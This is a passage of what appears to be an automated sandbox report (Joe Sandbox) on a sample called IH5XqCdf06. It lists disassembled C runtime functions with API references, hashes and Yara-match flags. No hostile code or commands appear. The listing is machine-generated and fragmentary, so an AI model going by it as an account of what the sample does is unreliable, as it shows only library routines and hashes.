                                                                                                    • Instruction ID: 9eaf7405896dd14c4a78eeb406b8bda5c301a4fa7f04f81269a814d90142e308
                                                                                                    • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                    • Instruction Fuzzy Hash: 9DF0A9759003113FEB113B757C9995B3FADDE47B23710063AF911E2292EB75C901855C
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 2005118841-3619870194
                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00431748
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043175A
                                                                                                    • _free.LIBCMT ref: 0043176D
                                                                                                    • _free.LIBCMT ref: 0043177E
                                                                                                    • _free.LIBCMT ref: 0043178F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0Qn
                                                                                                    • API String ID: 776569668-3531611336
                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 006719AF
                                                                                                      • Part of subcall function 006736D1: HeapFree.KERNEL32(00000000,00000000,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?), ref: 006736E7
                                                                                                      • Part of subcall function 006736D1: GetLastError.KERNEL32(?,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?,?), ref: 006736F9
                                                                                                    • _free.LIBCMT ref: 006719C1
                                                                                                    • _free.LIBCMT ref: 006719D4
                                                                                                    • _free.LIBCMT ref: 006719E5
                                                                                                    • _free.LIBCMT ref: 006719F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0Qn
                                                                                                    • API String ID: 776569668-3531611336
                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction ID: 22dda36f46199429fdbfde5d81133c9ab9847b377746365d0196b930a2932f5f
                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction Fuzzy Hash: 3BF051B0D10320A79EA17F24BC814043B61DF19722720426AF40697773C774D963DB8D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                    • _free.LIBCMT ref: 004311DD
                                                                                                    • _free.LIBCMT ref: 004311F6
                                                                                                    • _free.LIBCMT ref: 00431228
                                                                                                    • _free.LIBCMT ref: 00431231
                                                                                                    • _free.LIBCMT ref: 0043123D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275183328-0
                                                                                                    • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                    • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                    • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                    • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,006725EC,00000001,00000001,?), ref: 006723F5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006725EC,00000001,00000001,?,?,?,?), ref: 0067247B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00672575
                                                                                                    • __freea.LIBCMT ref: 00672582
                                                                                                      • Part of subcall function 0067390E: RtlAllocateHeap.NTDLL(00000000,0064DAD7,00000000), ref: 00673940
                                                                                                    • __freea.LIBCMT ref: 0067258B
                                                                                                    • __freea.LIBCMT ref: 006725B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                    • Instruction ID: ddc225ad532881ae24da791f23badcdfbdc48aebb6bf659676b54860e0d56829
                                                                                                    • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                    • Instruction Fuzzy Hash: CA51D072A1021BABEB258F64CCA1EEE77ABEB44750F158628FC08D6250EB74DD40C664
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe
                                                                                                    • String ID:
                                                                                                    • API String ID: 4189289331-0
                                                                                                    • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                    • Instruction ID: 1f9505c91cff5c5a626fbf529b1f3fe050d118e35ea280da77bbc8983e57649a
                                                                                                    • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                    • Instruction Fuzzy Hash: 8F51EE79900205ABDF649B68CC45AEE77EBAF44334F24422DF815D6392EF33DD118668
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00663051
                                                                                                      • Part of subcall function 00658AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00658ABD
                                                                                                    • SafeSQueue.LIBCONCRT ref: 0066306A
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0066312A
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0066314B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00663159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID:
                                                                                                    • API String ID: 3496964030-0
                                                                                                    • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                    • Instruction ID: d8f3ec77ae1d14eeb84604b1ff14780cae842c3cf84505a4125c8832c1221eeb
                                                                                                    • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                    • Instruction Fuzzy Hash: 7331E231A006229FCB65EF64C841AAAB7B2FF44711F10455DEC069B392DB30EE49CBC4
                                                                                                    APIs
                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00668F77
                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00668F90
                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00668F97
                                                                                                    • PMDtoOffset.LIBCMT ref: 00668FB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1467055271-0
                                                                                                    • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                    • Instruction ID: e391831dea2fb490f6294bb4366ed3cb3251f32b3d9b9544df659330c1c2d6bc
                                                                                                    • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                    • Instruction Fuzzy Hash: A421F772604205AFDF14DF78D946AAE77BBEF54790B24831EF91093281DF31ED0186A5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687354797-0
                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction ID: b8e514dc1ac1cefc031b4b2575e6ff6c3fa411efd87c767f98be22f55d023bd5
                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction Fuzzy Hash: AC216072C042089BDF55EBB8D845BDDB7FAAF09315F24405EF500BB282DB749A848679
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,32FADBCA), ref: 00428DE8
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                    • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,32FADBCA), ref: 00428E61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00669038,006669C9,00680907,00000008,00680C6C,?,?,?,?,00663CB2,?,?,0045A064), ref: 0066904F
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066905D
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00669076
                                                                                                    • SetLastError.KERNEL32(00000000,?,00669038,006669C9,00680907,00000008,00680C6C,?,?,?,?,00663CB2,?,?,0045A064), ref: 006690C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction ID: 7fb135e1c265c2ca8de8fbf74d86b91a981373b60bb653b8763a227076058c3c
                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction Fuzzy Hash: BB01FC362097116EA76427F46C899A7279EDB05775B30033DF920513E1EF338C5159AD
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                    • int.LIBCPMT ref: 00404D7A
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00644FCA
                                                                                                    • int.LIBCPMT ref: 00644FE1
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0064BFD4
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0064BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00644FEA
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0064501B
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00645031
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0064504F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction ID: 6bcf7acde31ae89099e346f8fd6490f3b07fbe95324d43b1b74b3ec2fc994f8f
                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction Fuzzy Hash: 3E11A0359006189BCBA5EB64C802AED77B2BF44710F54411DF4166B2D2DB749E05CBD8
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                    • int.LIBCPMT ref: 0040C1B1
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                    • int.LIBCPMT ref: 004054FA
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                    • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                    • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                    • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                    • int.LIBCPMT ref: 00404C3C
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0064C401
                                                                                                    • int.LIBCPMT ref: 0064C418
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0064BFD4
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0064BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0064C421
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0064C452
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0064C468
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0064C486
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction ID: 4b8494a0a73dacc5085880b247cedb2f1d4c47f0ac4db69828abfcd293c7ab66
                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction Fuzzy Hash: FC11CE719012189BCB91FBA4C815AED7BB2BF40720F64411DF411AB392DF349E05CBA8
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00644E8C
                                                                                                    • int.LIBCPMT ref: 00644EA3
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0064BFD4
                                                                                                      • Part of subcall function 0064BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0064BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00644EAC
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00644EDD
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00644EF3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00644F11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction ID: c11f7a35b05af96c4133cd10164a983dd9210b2bb2592c76335c38e8a71d0be2
                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                    • Instruction Fuzzy Hash: EC11CE31D002189BCF91EBA4D802AEE77B3BF44710F24011DF410A7292DF749E05CB98
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID: fJ@
                                                                                                    • API String ID: 1836011271-3478227103
                                                                                                    • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                    • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                    • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                    • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
